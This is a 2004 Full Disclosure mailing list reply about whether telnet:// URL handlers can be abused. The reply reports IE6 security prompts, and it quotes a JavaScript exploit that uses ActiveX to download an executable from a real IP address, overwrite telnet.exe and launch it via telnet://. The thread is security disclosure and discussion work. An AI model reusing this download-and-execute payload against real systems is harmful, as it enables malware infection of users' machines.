Full Disclosure mailing list archives

Re: telnet URL type used in exploit

From: Darren Reed <avalon () cairo anu edu au>
Date: Wed, 21 Jul 2004 12:25:33 +1000 (Australia/NSW)

Michael,

Out of curiosity, I tested this with IE 6.0.2800.1106.xpsp2.030422-1633
and got a popup box saying:

"This page is accessing information that is not under its
control. This poses a security risk. Do you want to
continue?" [Yes] [No]

And that was loading it into IE as a *local file*...when I put it on
a web page, I got the usual half dozen alerts about "do you want to run
javascript", etc. that even if I said yes to it didn't work.  

Did you get that popup box when you tested your script below ?

Darren

In reply the discussion found at: 

http://seclists.org/lists/fulldisclosure/2004/Jul/0528.html

the consesus seems to be that there are no obvious ways to exploit the
mentioned URL types, such as tn3270, telnet, LDAP, rlogin etc. While
these may not be exploitable per se, they certainly are when used in
conjction with other known exploits. Take the following code for
example:

var downloadurl="http://213.159.117.133/dl/loadadv74.exe";;

if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
savetopath="C:\\WINDOWS\\system32\\telnet.exe";

if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1)
savetopath="C:\\WINNT\\system32\\telnet.exe";

payloadURL = downloadurl;

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();

function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t"
+ "r" + "e" + "a" + "m"; }
var s = new ActiveXObject(bla());

s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(savetopath,2);

location.href = "telnet://";

The JavaScript overwrites telnet.exe with a downloaded executable and
then runs it by pointing the browser at telnet://. Instead of
launching a telnet shell as expected, the attackers code is executed.
This is not only an example of the telnet URL type being involved in
an exploit, but one that actually relies on it.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

telnet URL type used in exploit Michael Hale (Jul 20)
- RE: telnet URL type used in exploit KM (Jul 20)
- Re: telnet URL type used in exploit Aditya, ALD [ Aditya Lalit Deshmukh ] (Jul 21)
- Re: telnet URL type used in exploit Darren Reed (Jul 21)
  - Re: telnet URL type used in exploit Michael Hale (Jul 20)